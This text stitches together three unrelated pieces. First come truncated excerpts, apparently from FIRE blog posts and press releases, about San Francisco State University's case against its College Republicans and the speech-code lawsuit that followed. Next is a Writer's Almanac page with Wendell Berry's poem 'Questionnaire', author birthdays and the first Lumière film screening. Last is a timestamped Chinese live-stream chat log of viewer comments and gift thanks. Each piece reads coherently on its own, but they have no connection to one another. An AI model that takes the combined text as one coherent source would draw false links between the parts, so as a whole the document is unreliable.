As April’s election for Harvard University’s Board of Overseers draws nearer, the candidacy of FIRE co-founder and chairman Harvey Silverglate continues to attract attention and enthusiasm. Scot Lehigh’s excellent column in The Boston Globe is just the latest testament to this, as Adam wrote earlier for The Torch (and as the Cato Institute’s Cato @ Liberty blog briefly noted as well). Even unlikely supporters such as this blogger in Falmouth, Nova Scotia have taken notice of Harvey’s candidacy. FIRE expects the energy to continue to rise in the final weeks before voting ballots are sent out to Harvard alumni. Hopefully […]
The College Republicans at San Francisco State University (SFSU) held an anti-Hamas rally on Wednesday at which at least one group member stepped on a Hamas flag, apparently leading offended students to call for the group’s punishment. No, we haven’t accidentally re-posted our “This Month in FIRE History” blog—believe it or not, these events just happened last week! Reaction to the rally has been fast and furious; according to the College Republicans’ blog, a coalition of students offended by the rally will shortly be releasing a statement containing the following demands: Authorities must drop all charges pending against [the two […]
As documented in our video FIRE on Campus: An Introduction to the Foundation for Individual Rights in Education, one of FIRE’s most shocking February cases over our ten-year history began two years ago at San Francisco State University, when the university administration responded to FIRE defending its decision to investigate the College Republicans for an anti-terrorism rally. As a part of the group’s event, they painted mock Hamas and Hezbollah flags on large pieces of paper and stepped on them to show their outrage for the actions of those groups. Unbeknownst to the protestors, the flags they had copied contained […]
On the seventh anniversary of the 9/11 terrorist attacks on our nation, FIRE joins the rest of the country in remembering those who were lost. As we look back on that day, it is important that we also remind ourselves of the importance of the freedoms that make this country what it is, and that we commit ourselves to defending those freedoms when they are threatened. As those who follow FIRE’s work well know, many, if not most, American colleges and universities restrict freedom as much as they claim to promote it. In fact, in the immediate wake of the […]
Yesterday, I reported about the Outdoor Event Request Form policy at San Francisco State University (SFSU) barring all student groups from holding outdoor events. The Alliance Defense Fund (ADF) wrote to SFSU on behalf of the College Republicans demanding that SFSU respect its students’ First Amendment rights and change the policy. We are happy to report that J.E. Saffold, Vice President for Student Affairs and Dean of Students, promptly responded to ADF’s letter and retracted the ban on outdoor events. That said, we are a little irked at Saffold’s dishonesty. Saffold claims that groups were never barred from holding events […]
San Francisco State University is at it again. SFSU has posted a statement on its website suspending all outdoor protests. The statement reads: The Outdoor Reservation Request Process for Fall 2008 and Spring 2009 events has been postponed until further notice per University Administration. The postponement will be in effect until completion of a review of Time, Place, and Manner policies by a task force with final recommendations subject to Presidential approval by the President’s Cabinet. It is the intent that the review will be completed in early summer. We apologize for any inconvenience. The College Republicans intend to hold […]
Chalk up another victory for FIRE’s Speech Codes Litigation Project. Today’s press release discusses the settlement of the lawsuit against San Francisco State University (SFSU), challenging the school’s unconstitutional speech codes. The press release explains: SFSU’s speech codes had banned expression clearly protected by the United States Constitution. For example, the college’s sexual harassment policy defined sexual harassment as “one person’s distortion of a university relationship by unwelcome conduct which emphasizes another person’s sexuality.” A policy regulating student organizations had banned any conduct “inconsistent with SF State goals, principles, and policies.” In addition, the SFSU College Republicans was unconstitutionally targeted […]
SAN FRANCISCO, March 4, 2008—Yesterday, San Francisco State University (SFSU) settled a lawsuit challenging its speech codes by agreeing to modify several unconstitutional policies to make them consistent with the First Amendment. The settlement also requires SFSU to pay damages to members of the university’s College Republicans as well as to pay the College Republicans’ attorney fees. The lawsuit—part of the Foundation for Individual Rights in Education’s (FIRE’s) Speech Codes Litigation Project—was filed in July 2007 by attorneys from the Alliance Defense Fund (ADF). “Unconstitutional speech codes have been dealt yet another blow,” FIRE President Greg Lukianoff said. “This lawsuit […]
When it comes to speech restrictions and the law in 2007, perhaps the fairest thing that can be said is that this was a “complicated” year for advocates of free speech on campus. As many people know, the Supreme Court took on a student speech case this year, Morse v. Frederick—but the catch is that this case was about a high school student, not a college student. For high school students, the news was clearly bad. As Samantha put it in a June 24 blog entry on the decision, “The Supreme Court further eroded high school students’ free speech rights […]
The New York Post reports today that Canadian author Mark Steyn is facing charges in Canada for the opinions expressed in his book America Alone: After the Canadian general-interest magazine Maclean’s reprinted a chapter from the book, five Muslim law-school students, acting through the auspices of the Canadian Islamic Congress, demanded that the magazine be punished for spreading “hatred and contempt” for Muslims. The plaintiffs allege that Maclean’s advocated, among other things, the notion that Islamic culture is incompatible with Canada’s liberalized, Western civilization. They insist such a notion is untrue and, in effect,want opinions like that banned from publication. […]
In a significant victory for speech rights on campus, U.S. Magistrate Judge Wayne Brazil ruled earlier this month that the plaintiffs in the San Francisco State University (SFSU) speech codes litigation were entitled to a preliminary injunction with respect to the University’s requirement that students be “civil” toward one another and its provision allowing student groups and organizations to be punished collectively if any member engages in conduct “inconsistent with SF State goals, principles, and policies.” Sam has already analyzed Judge Brazil’s treatment of these issues, as well as his important discussion of the clear differences between the high school […]
Earlier this month, U.S. Magistrate Judge Wayne Brazil partially granted plaintiffs’ motion for a preliminary injunction in the San Francisco State University (SFSU) speech codes litigation. Yesterday, Judge Brazil issued his written opinion on the motion, and in so doing struck a devastating blow against speech codes at universities in California and hopefully—to the extent that his wise words are heeded by judges in other jurisdictions—across the country. Judge Brazil’s opinion proves that he truly is—as he said from the bench on October 31—a “friend of the First Amendment.” In discussing the general importance of the First Amendment, he wrote […]
Check out FIRE co-founder Harvey Silverglate’s blog post over at The Free For All about our recent victory over San Francisco State University’s speech code. Harvey concludes: Of course, there’s nothing wrong with civility, but, like much that is virtuous, it must be the product of voluntary self-restraint, not orders barked by an intrusive (and unconstitutional) campus feel-good bureaucracy. Magistrate-Judge Brazil said he would issue a written opinion, which we’ll be looking for. Meanwhile, let us each do a good deed and find someone today to whom to be voluntarily civil.
As we announced in our press release today, a federal judge granted a preliminary injunction prohibiting San Francisco State University (SFSU) and the California State University (CSU) System as a whole from enforcing several unconstitutional speech codes. The codes were challenged in a lawsuit filed by attorneys from the Alliance Defense Fund (ADF) in cooperation with the Foundation for Individual Rights in Education (FIRE). This lawsuit—the latest in FIRE’s Speech Codes Litigation Project—was filed by the SFSU College Republicans and two of the group’s individual members after SFSU violated the group’s First Amendment rights last year by dragging them through […]
SAN FRANCISCO, November 8, 2007—In a crucial victory for free speech, a federal judge has ordered San Francisco State University (SFSU) and the California State University System (CSU) to stop enforcing several unconstitutional speech codes. The codes were challenged in a lawsuit filed by attorneys from the Alliance Defense Fund (ADF) in cooperation with the Foundation for Individual Rights in Education (FIRE). “This decision is a vital step in the fight against unconstitutional campus speech codes,” FIRE President Greg Lukianoff said. “The court’s decision frees hundreds of thousands of students throughout the CSU System from unlawful restrictions on their expression.” […]
This has been a truly fantastic week for freedom on campus. Not only did the University of Delaware end its program of mandatory thought reform, but on Wednesday, a federal judge in California enjoined the enforcement of several unconstitutional speech codes at San Francisco State University (SFSU). The lawsuit—part of FIRE’s Speech Codes Litigation Project—was filed by the SFSU College Republicans this past July. Torch readers may recall that the SFSU College Republicans were dragged through a prolonged investigation and hearing simply for engaging in constitutionally protected expression. They brought suit both to challenge the university’s blatant violation of their […]
Oral arguments in the San Francisco State University (SFSU) College Republicans’ lawsuit against the university will be taking place today at 1:30 PT (4:30 ET) in the U.S. District Court for the Northern District of California, Oakland Division. The College Republicans are asking the court to enjoin SFSU from enforcing several unconstitutional speech codes on campus. Torch readers may remember that after the College Republicans were dragged through a protracted investigation and hearing for engaging in constitutionally protected expression, they brought a lawsuit (the latest suit in FIRE’s Speech Codes Litigation Project) challenging not only the university’s violation of their […]
As Will discussed earlier, Florida International University professor Stanley Fish argues in his latest “Think Again” column for The New York Times that campus speech codes do not present as much of a problem for students as one might think. In the process of reviewing filmmaker Evan Coyne Maloney’s Indoctrinate U, Fish argues that any negative effects that speech codes may have on the state of free speech on campus is overblown because colleges will rarely, if ever, actually enforce their speech codes. Pointing to the fact that every speech code that has been litigated in the courts has ultimately […]
The lazy days of summer must have passed us over at FIRE, for one look at our media coverage for July reveals just how busy we’ve been. The latest effort in FIRE’s Speech Codes Litigation Project, a lawsuit filed against San Francisco State University, was the subject of a syndicated Associated Press article, a news brief on Special Report with Brit Hume on FOXNews.com, and our last Campus Alert column in the New York Post before we took a summer break. Reason Online and The Chronicle of Higher Education also covered the SFSU lawsuit in nationally circulated pieces. The second […]
An article in The Evening Bulletin yesterday highlights FIRE’s latest case in its highly successful speech codes litigation project, an effort to rid universities of unconstitutional speech regulations. Organized by FIRE, the Alliance Defense Fund and the San Francisco State University (SFSU) College Republicans are suing SFSU for a violation of the College Republicans’ First Amendment rights. Last year, SFSU put the College Republicans through a five-month trial for stepping on Hamas and Hezbollah flags during an anti-terrorism rally. The lawsuit also targets several policies that unconstitutionally restrict protected speech.
This week, Campus Alert—FIRE’s weekly column in the New York Post—focuses on the situation at San Francisco State University (SFSU), where the school’s College Republicans filed a federal lawsuit last week alleging that SFSU administrators violated the group’s First Amendment rights by staging a five-month investigation into the group’s activities at an anti-terrorism rally. Specifically, SFSU’s investigation centered on whether the College Republicans were guilty of “actions of incivility,” among other charges, for stepping on homemade Hezbollah and Hamas flags. However, as today’s column points out, the United States Supreme Court has consistently held that flag desecration is protected political […]
The lawsuit against San Francisco State University continues to attract media coverage from local San Francisco outlets and nationally read journalists and bloggers. In addition to an article on the syndicated Associated Press wire, the story appeared on The Special Report with Brit Hume on FOXNews Channel and FOXNews.com, in The Chronicle of Higher Education, and in a post on Reason Online’s widely read Hit and Run blog. David French of the Alliance Defense Fund, the organization that filed the lawsuit, also wrote about the SFSU case on National Review Online’s Phi Beta Cons. His post includes a great summary of […]
The media coverage of the lawsuit filed in cooperation with FIRE against San Francisco State University continues. FIRE President Greg Lukianoff will appear on the Pete Wilson Program on San Francisco ABC News affiliate KGO-AM at 2 p.m. PST (5 p.m. EST) today to discuss the case and our latest efforts in FIRE’s highly successful Speech Codes Litigation Project. Torch readers can listen online here.
The federal lawsuit against SFSU hit the news this morning, with articles in the International Herald Tribune and The Chronicle of Higher Education (subscription required). One quick but important clarification of those articles: FIRE is not representing the plaintiffs in the lawsuit, but rather worked to coordinate the lawsuit that was filed yesterday by the Alliance Defense Fund (ADF). This is the modus operandi of FIRE’s Speech Codes Litigation Project: FIRE coordinates litigation—filed by cooperating attorneys from FIRE’s Legal Network—in defense of the First Amendment, in an effort to end the scourge of unconstitutional speech codes on public campuses. […]
FIRE’s Speech Codes Litigation Project is moving forward as attorneys from the Alliance Defense Fund (ADF), in cooperation with FIRE, filed a federal lawsuit today against San Francisco State University (SFSU) for violating its students’ First Amendment rights. Torch readers will likely recall the debacle at SFSU this past spring, when the SFSU College Republicans were tried by a campus tribunal for the “offense” of stepping on makeshift Hamas and Hezbollah flags during an anti-terrorism rally they held in October, 2006. Of course, as FIRE repeatedly told SFSU’s leadership, flag desecration in the context of political protest is constitutionally […]
SAN FRANCISCO, July 9, 2007—San Francisco State University (SFSU) is the latest target of the Foundation for Individual Rights in Education’s (FIRE’s) highly successful Speech Codes Litigation Project. In cooperation with FIRE, attorneys filed a federal lawsuit against SFSU for violating the First Amendment rights of its students. The Alliance Defense Fund (ADF), a Phoenix-based nonprofit organization devoted to protecting religious liberty, filed the suit. “Through its policies and practices, SFSU has violated and continues to violate the First Amendment rights of every student on its campus,” FIRE President Greg Lukianoff said. “Beginning today, SFSU will have to answer for […]
FIRE President Greg Lukianoff’s new column in the latest FIRE Quarterly explores how university administrators’ try to squelch student speech acting “like the censors of the Victorian era—morally infallible, plugged into absolute truth, and engaged in saving the country’s soul from incivility or impropriety. As Greg points out, FIRE’s recent cases at Johns Hopkins University, San Francisco State University (SFSU), and Columbia University’s Teachers College have all brought with them galling attempts by university officials to crack down on expression by a variety of different methods that seem to want to save campus communities from impropriety. These tactics range from […]
Check out our latest, newly re-designed issue of The FIRE Quarterly, which contains news updates on FIRE events and victories in cases at universities across the country. Some highlights from this edition include a look at our victory at San Francisco State University (SFSU), where FIRE stepped in to defend SFSU’s College Republicans after the school tried to punish them for stepping on makeshift Hezbollah and Hamas flags at an anti-terrorism rally. We also report on FIRE victories for freedom of association for Christian student groups at Brown University and at Pace University, and a victory for freedom of speech […]
The Collegiate Network has released their 2007 Campus Outrage Awards, an effort “to shed light on the most outrageous instances of intolerance and intimidation on the part of college officials.” Out of the five awards, two went to schools for their involvement in a FIRE case. At Johns Hopkins University (JHU), The Carrollton Record (TCR), an independent student paper, ran a cover story entitled “Deepthroating Hopkins,” on the use of student fees to pay for a speech by pornographic film director Chi-Chi La Rue. The JHU administration refused to condemn the theft of 600 copies of the paper, alleging […]
In Reason Online yesterday, the ever-reasonable Cathy Young discussed a string of FIRE cases involving students punished for expressing hostility toward Islam. Young notes that there is a disturbing trend afoot involving college administrators acting hastily, often with disciplinary action, against students who have been seen as blaspheming Islam. Of course there is the SFSU case, in which students were put on trial for desecrating not just the flags of terrorist organizations, but the name “Allah.” Young ties SFSU’s actions in with the Mohammed cartoon controversy and even Michigan State University’s recent attempt to make the Young Americans for Freedom […]
We were genuinely thrilled to announce yesterday that SFSU finally came to its senses and recognized that it could not lawfully punish the College Republicans for their political protest. We’ve talked a lot on The Torch already about the public outcry surrounding the case—the letters from FIRE, the ACLU of Northern California, and the numerous individuals who took the time to write to SFSU and express their concerns about the university’s disregard for free speech. Now I’d like to talk a little bit about the courage of the students at the center of this debacle. FIRE can only do […]
As our press release today announces, San Francisco State University (SFSU) has found the College Republicans not guilty of allegations of incitement, creating a hostile environment, and actions of incivility. SFSU President Robert Corrigan stated in a letter to FIRE yesterday that “the Student Organization Hearing Panel (SOHP) unanimously concluded that the College Republicans organization had not violated the Student Code of Conduct and that there were no grounds to support the student complaint lodged against them.” That complaint was filed after the College Republicans held an anti-terrorism rally on October 17, 2006, during which they stepped on paper […]
SAN FRANCISCO, March 20, 2007—In a crucial victory for free expression, San Francisco State University (SFSU) announced yesterday that its College Republicans will face no punishment for hosting an anti-terrorism rally at which participants stepped on makeshift Hezbollah and Hamas flags. SFSU’s decision comes after months of pressure from the Foundation for Individual Rights in Education (FIRE), national and local media, and the public—all of which called on the school to uphold the students’ constitutionally guaranteed right to free expression. “We are relieved that SFSU has come to its senses and recognized that it cannot punish students for constitutionally protected […]
Yesterday on Phi Beta Cons, David Frum reposted a column about the “ongoing scandal” at SFSU that he wrote for Canada’s National Post. Frum had some wise words about the broader implications of the SFSU case: The SFSU College Republicans will prevail in the end. Even if the university sanctions them, those sanctions will be appealed to federal court and swiftly overturned. It is the universities for whom we should worry. They lack the courage to defend the freedom without which they cannot live.
Upon receiving a FIRE press release regarding a threat to free speech on a university campus, FIRE friend Dr. David Ross always e-mails the administrator in question and asks a simple question: is this true? After writing to San Francisco State’s administration regarding FIRE’s latest press release decrying the trial of the SFSU College Republicans, who stomped on Hamas and Hezbollah flags during an anti-terrorism rally, Dr. Ross received the following disturbing response: I am responding to your message concerning San Francisco State’s handling of a student complaint against the College Republicans Club. To clarify some matters of fact: […]
When FIRE learned that SFSU was pushing forward with disciplinary proceedings against the College Republicans, we wrote an urgent letter to SFSU President Robert Corrigan advising him of the serious legal risks involved in pursuing a course of action that is clearly proscribed by established, well-known Supreme Court precedent. FIRE wrote that: Any punishment enforced against the College Republicans under SFSU’s student conduct policies as a consequence of their exercise of their First Amendment rights is an unlawful deprivation of constitutional rights under 42 U.S.C.S. § 1983 for which SFSU administrators can be sued in their individual capacities. Moreover, when […]
In just a few minutes, FIRE Vice President Robert Shibley will be a guest on today’s edition of the BBC News radio program ‘World Have Your Say.’ The topic of today’s show is “Are universities stifling debate on the Middle East,” and Robert will be discussing FIRE’s current case at San Francisco State University. Interested Torch readers can listen live on the BBC World Service at 1 p.m. Eastern time.
In the latest development in SFSU’s prosecution of the College Republicans, SFSU President Robert Corrigan has written a response to FIRE’s March 7 letter urging the administration to end proceedings against the students who dared to step on Hamas and Hezbollah flags in an act of political protest. In his reply, Corrigan points FIRE toward the statement SFSU posted on its website recently defending its actions in the investigation and hearing that followed the College Republicans’ protest. The statement is called “On avoiding a rush to judgment”—an interesting title considering that the College Republicans’ alleged misdeeds took place […]
As part of tomorrow’s San Francisco launch of The Mancow Show on KTRB AM 860 in San Francisco, FIRE’s Greg Lukianoff will appear to discuss our recent case at San Francisco State University at 6:10 a.m. PST (9:10 a.m. EST). The show—which reaches 2.5 million listeners—is nationally syndicated and available online, so tune in to hear the latest on what is happening to College Republican students who were tried by a panel of faculty, administrators, and students for participating in an anti-terrorism protest at which they stepped on makeshift Hezbollah and Hamas flags.
The Philadelphia Bulletin has an in-depth article today about the ongoing betrayal of free speech at San Francisco State University (SFSU). Bulletin columnist Joe Murray leads off with a discussion of SFSU’s history of censorship, pointing out the hypocrisy of those currently seeking to censor conservative voices at SFSU: SFSU is not a stranger to First Amendment controversy, for in 1968 a student strike organized by the leftist Third World Liberation Front completely overwhelmed the campus. The strike, which was supported by Students for a Democratic Society (SDS) and the Black Panthers, disrupted campus activities, called for an end to […]
San Francisco State University went forward on Friday with its trial of the College Republicans for the (constitutionally protected) “offense” of stepping on drawings of the Hamas and Hezbollah flags during an anti-terrorism rally. According to College Republican Leigh Wolf, who represented his organization at the hearing, it was more or less a complete mockery of justice. The hearing panel should be delivering its decision within 10 days, and we hope to have a recording of the hearing available on our site within a day or two. We will keep you posted.
SAN FRANCISCO, March 9, 2007—Showing brazen disregard for its students’ clearly established constitutional rights, San Francisco State University (SFSU) is putting the College Republicans on trial today for hosting an anti-terrorism rally at which participants stepped on makeshift Hezbollah and Hamas flags. University officials have alleged that the students desecrated the name of Allah, which is written on both flags in Arabic script. The student group’s leadership contacted the Foundation for Individual Rights in Education (FIRE) for help when they first learned of the school’s investigation. “SFSU must call off this hearing immediately,” FIRE President Greg Lukianoff said. “The College […]
The plight of the College Republicans at San Francisco State University (SFSU) should frighten everyone who values his or her freedom. SFSU, a public university, is putting its College Republicans on trial tomorrow for symbolic expression that is unequivocally protected by the First Amendment. Both FIRE and the American Civil Liberties Union (ACLU) of Northern California have written to the university urging it to see the obvious error of its ways, but SFSU, undeterred by reality, appears to be pressing forward with its kangaroo trial. The facts are straightforward. After the College Republicans held an anti-terrorism rally on campus, […]
National Review Online features an article today by Brendan Conway about the College Republicans at San Francisco State University (SFSU). Conway writes: What is quite possibly the strangest flag-desecration controversy in American history is afoot right now at San Francisco State University. It’s strange for several reasons, firstly because the right to torch, stomp, or otherwise annihilate a flag was asserted nearly 18 years ago by the Supreme Court in Johnson v. Texas, and should be pretty much settled by now. Not here, though, where a chapter of College Republicans could be disbanded for allegedly inciting hostility via an act […]
March 7, 2007 President Robert A. Corrigan President’s Office, ADM 562 1600 Holloway Avenue San Francisco, California 94132 URGENT Sent via U.S. Mail and Facsimile (415-338-6210) Dear President Corrigan: It is with both deep disappointment and renewed resolve that FIRE is forced to write to you again to voice our grave concern about the threat to free expression posed by San Francisco State University’s (SFSU’s) ongoing investigation of the SFSU College Republicans for the content of an anti-terrorism rally held October 17, 2006. FIRE has learned that SFSU’s Student Organization Hearing Panel (SOHP) plans to hold a hearing this Friday, […]
Daphne Patai, a member of our Board of Directors, contributed to our recent edition of The FIRE Quarterly with a column reinforcing the importance of FIRE’s work after a year in which we saw so many attempts to limit student speech on campus. She wrote: Where restrictions on speech must, by law, be content-neutral, universities these days have the habit of taking it upon themselves to decide which points of view are to be protected by the First Amendment and which are not. Where the law prohibits harassment only if it is “persistent and pervasive” enough to interfere with an […]
Karen Arenson has an article in The New York Times this morning about the film “Obsession: Radical Islam’s War Against the West,” which she calls “the latest flashpoint in the bitter campus debate over the Middle East.” The film shows anti-Western clips from Arab television programming and documentary footage of suicide bombers, at times comparing militant Islam to the Nazi movement. Many campus groups—mostly Hillels and other Jewish student organizations—have organized showings of “Obsession” at their universities. As Arenson reports, both the film’s message and the pro-Israeli nature of the viewings have sparked debate among students about Middle Eastern […]
San Francisco State University students involved in the recent controversy surrounding an anti-terrorism protest where College Republicans stepped on makeshift Hamas and Hezbollah flags are scheduled to appear on today’s The Live Desk with Martha MacCallum on the FOX News Channel. The segment is set to broadcast during the hour-long program, which airs from 1 to 2 p.m. Eastern.
Yesterday, FIRE took public one of its more outrageous cases: that of San Francisco State University (SFSU), where the College Republicans are to stand trial for stomping on Hamas and Hezbollah flags during a protest. The specific “offenses?” “Incitement” and creating a “hostile environment.” Now, it’s well-known to just about everyone with any knowledge of the First Amendment that burning an American flag is protected political expression. We have to assume that SFSU knows this too, and has managed to reason out that if you can cause whatever damage you like to an American flag, you can certainly do the […]
Today’s press release announces that San Francisco State University (SFSU) is investigating the College Republicans for holding an anti-terrorism protest on campus last October. During the protest, the College Republicans stepped on paper they had painted to represent the Hamas and Hezbollah flags. Unbeknownst to the protesters, the flags they copied bear the word “Allah.” The SFSU student government, Associated Students, Inc., passed a resolution condemning the College Republicans, and other students filed complaints with the university claiming that the College Republicans walked on a banner with the word “Allah” written in Arabic script. FIRE wrote to SFSU President Robert […]
SAN FRANCISCO, Calif., February 8, 2007—In a profound display of disrespect for free speech, San Francisco State University (SFSU) is investigating its College Republicans for hosting an anti-terrorism rally on campus in which participants stepped on makeshift Hezbollah and Hamas flags. After students filed a complaint claiming they were offended because the flags bore the word “Allah,” SFSU initiated an investigation into accusations of incitement, creation of a hostile environment, and incivility. Members of the College Republicans then contacted the Foundation for Individual Rights in Education (FIRE) for assistance. “At a public university, stepping on a flag—even burning an American […] | mini_pile | {'original_id': '3899947431bad6266926bc949c30c860b9bd5e73664f116fc10fff0fe48105c7'} |
Mar. 22, 2014
by Wendell Berry
How much poison are you willing
to eat for the success of the free
market and global trade? Please
name your preferred poisons.
For the sake of goodness, how much
evil are you willing to do?
Fill in the following blanks
with the names of your favorite
evils and acts of hatred.
What sacrifices are you prepared
to make for culture and civilization?
Please list the monuments, shrines,
and works of art you would
most willingly destroy
In the name of patriotism and
the flag, how much of our beloved
land are you willing to desecrate?
List in the following spaces
the mountains, rivers, towns, farms
you could most readily do without.
State briefly the ideas, ideals, or hopes,
the energy sources, the kinds of security;
for which you would kill a child.
Name, please, the children whom
you would be willing to kill.
"Questionnaire" by Wendell Berry from Leavings. © Counterpoint, 2010. Reprinted with permission. (buy now)
It's the birthday of novelist Louis L'Amour (books by this author), born in Jamestown, North Dakota (1908). He was the author of many novels, including How the West Was Won (1963) and The Quick and the Dead (1973). L'Amour wrote: "I just pointed my rifle at him ... and let him have the big one right through the third button on his shirt. If he ever figured to sew that particular button on again he was going to have to scrape it off his backbone."
It's the birthday of the lyricist and composer Stephen Sondheim, born in New York City (1930). He wrote his first musical when he was 15. When he was 27, he was offered a job writing lyrics for a new musical that would be a modern retelling of Romeo and Juliet, set in New York City. Sondheim wasn't sure he wanted to write lyrics without music, but he decided to take the job anyway, and the result was West Side Story (1957), which got mixed reviews on Broadway, but became a huge hit as a movie.
It's the birthday of the best-selling novelist in the world, James Patterson (books by this author), born in Newburgh, New York (1947). He was an executive for J. Walter Thompson, one of the largest ad agencies in the world. But he decided to retire and devote himself to writing. He has published more than 70 novels, and according to recent data, he outsells Stephen King, Dan Brown, and John Grisham combined.
It's the birthday of the man who said, "My poetry is suburban, it's domestic, it's middle class, and it's sort of unashamedly that, but I hope there's enough imaginative play in there that it's not simply poems about barbecuing." That's the poet Billy Collins (books by this author), born in New York City (1941). He was an only child. Before he even knew how to read, he would page through books and pretend that he was reading whenever his parents had company. He said: "I would say it was a fairly happy childhood. But they say he who says that is just better at repressing things." He wrote his first poem at the age of seven when he was driving with his parents and looked out the window and saw a sailboat on the East River.
He hasn't stopped writing poems since then. He said: "I was a most impressionable teenager back in the days of beatnik glory, so I responded fully to Kerouac, Ginsberg, Ferlinghetti's 'Coney Island of the Mind' — still a good title — Gregory Corso, and others. I was in Paris for a summer in the early sixties and hung self-consciously around the corners of the scene on the Boul Mich, as they called it. I sat at the same table with Corso and others, and I even hung around with an American girl named Ann Campbell, whom Realities magazine had called 'The Queen of the Beatniks.' (Let's see ... what did that make me??) But mostly I was a Catholic high school boy in the suburbs who fantasized about stealing a car and driving nonstop to Denver. I probably would have done it, but I didn't have access to those special driving pills Neal Cassady had. Plus, there was always a test to study for, or band practice."
His books include The Art of Drowning (1995), Sailing Alone Around the Room: New and Selected Poems (2001), Horoscopes for the Dead (2011), and most recently, Aimless Love (2013).
The first private screening of a motion picture took place in Paris on this date in 1895. Auguste and Louis Lumière had heard about Thomas Edison's new invention, the Kinetoscope. It was a peephole machine that pulled a strip of film in front of a light source, and to the viewer, the images on the film seemed to move. The Lumière brothers, who had a business selling photographic plates, decided to come up with a device to project the images on a screen so that more than one person could view them at a time. Their very first footage was a group of workers leaving the Lumière factory in Lyon. It was 46 seconds long, and they shot it only three days before its big premiere. They shot three versions, all pretty much the same: a man opens the big wooden gates of the factory, and a crowd pours out. The workers are mostly women in long dresses, aprons, and big hats, and there's a large dog running to and fro, barking. Sometimes there is a horse, or two horses, pulling a big dray, and that's how the different films are distinguished from one another: the one-horse, the two-horse, or the no-horse version.
The private screening was held at a conference of the Society for the Development of the National Industry. About 200 people attended, including Léon Gaumont, director of a prestigious photographic supply company who would go on to become a movie pioneer in his own right. The purpose of the conference was to discuss the latest industry developments, and the Lumière brothers were there to present advances they had made in color photography. To the Lumières' great surprise, however, the audience was much more interested in the moving black-and-white images than they were in any color photographs. Word spread rapidly, and they held more screenings and shot more short films, which they debuted before a paying public audience for the first time the following December. But despite all the buzz around their short films, the Lumières viewed motion pictures as nothing more than a fad. They said, "The cinema is an invention without any future."
• “Writing is my dharma.” —Raja Rao
The Writer's Almanac on Facebook
The Writer's Almanac on Twitter
An interview with Jeffrey Harrison at The Writer's Almanac Bookshelf
Current Faves - Learn more about poets featured frequently on the show
O, What a Luxury
| dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '299', 'language_id_whole_page_fasttext': "{'en': 0.9757455587387084}", 'metadata': "{'Content-Length': '45189', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:WLAOGB4EHN5NPNCF57WKHCEBZJUELJ2P', 'WARC-Concurrent-To': '<urn:uuid:796df3d5-5a70-45b7-b5ad-97cd91a75586>', 'WARC-Date': datetime.datetime(2015, 3, 1, 8, 27, 8), 'WARC-IP-Address': '184.51.126.40', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:4IE2MFKL6TKQMX7JXHKBCALXFIRKDLEE', 'WARC-Record-ID': '<urn:uuid:0a087314-34fa-4b45-9cfe-841c8707714d>', 'WARC-Target-URI': 'http://writersalmanac.publicradio.org/index.php?date=2014/03/22', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:a9cee4f2-3b0a-4fb3-9542-66d195313210>', 'WARC-Truncated': None}", 'previous_word_count': '1452', 'url': 'http://writersalmanac.publicradio.org/index.php?date=2014/03/22', 'warcinfo': 'robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.047284066677093506', 'original_id': 'c8f769995eb1e60aa3ea381572d860e2cae73ac98fe2d1a476642aba4f8b6521'} |
1580757984134:65729961:(｀・ω・´)
1580821408327:38929857:这是啥游戏鸭
1580822931675:38929857:我是来听声音的哈哈
1580822946396:247:提前蹲(=・ω・=)
1580823002291:247:晚上好吖
1580823023005:130084312:你好像感冒了
1580823059127:498604787:晚上好
1580823060510:130084312:恐怖游戏
1580823076830:498604787:(｢･ω･)｢嘿
1580823098015:381768785:晚上好(｡･ω･｡)ﾉ♡
1580823108870:498604787:好呀
1580823110766:381768785:恐怖吗
1580823112124:387108043:感谢呓语み赠送的1个新年红包~mua~
1580823115623:387108043:感谢呓语み赠送的2个新年红包~mua~
1580823124694:387108043:感谢帝曦曦曦曦赠送的3个新年红包~mua
1580823127242:387108043:~
1580823128796:387108043:感谢枫叶晨世赠送的3个新年红包~mua~
1580823130364:387108043:感谢帝曦曦曦曦赠送的4个新年红包~mua
1580823133038:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580823134582:387108043:~
1580823139447:387108043:感谢艾斯亚瑟珂兰癸赠送的1个礼花~mua
1580823141004:387108043:~
1580823148826:387108043:感谢取啥名才好丶赠送的1个红灯笼~mua
1580823150372:387108043:~
1580823171661:387108043:感谢-萌虾-赠送的4个新年红包~mua~
1580823173073:212467696:恐怖游戏？
1580823182188:498604787:(｢･ω･)｢嘿
1580823183097:387108043:感谢雨落星辰hong赠送的5个新年红包~
1580823184639:387108043:mua~
1580823198587:212467696:不会啊，我宁愿全屏都是右下角那个东西
1580823202518:387108043:感谢冬月日夏赠送的3个新年红包~mua~
1580823204050:387108043:感谢帝曦曦曦曦赠送的2个吃瓜~mua~
1580823209666:387108043:感谢帝曦曦曦曦赠送的2个吃瓜~mua~
1580823215440:387108043:感谢帝曦曦曦曦赠送的2个吃瓜~mua~
1580823227802:387108043:感谢枫叶晨世赠送的1个爆竹~mua~
1580823254871:387108043:感谢帝曦曦曦曦赠送的2个爆竹~mua~
1580823261521:387108043:感谢帝曦曦曦曦赠送的1个爆竹~mua~
1580823266609:387108043:感谢在河之上赠送的1个新年红包~mua~
1580823275843:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580823277145:387108043:~
1580823278173:247:～
1580823279226:387108043:感谢帝曦曦曦曦赠送的3个新年红包~mua
1580823281042:130554:这是我画质的问题 还是游戏就这样。。。
1580823281042:387108043:感谢帝曦曦曦曦赠送的2个新年红包~mua
1580823282944:387108043:~
1580823284997:387108043:感谢帝曦曦曦曦赠送的1个新年红包~mua
1580823288700:387108043:感谢aircrack-ng赠送的1个新年
1580823291156:387108043:红包~mua~
1580823295988:212467696:这么鬼畜吗
1580823303011:498604787:(｢･ω･)｢嘿
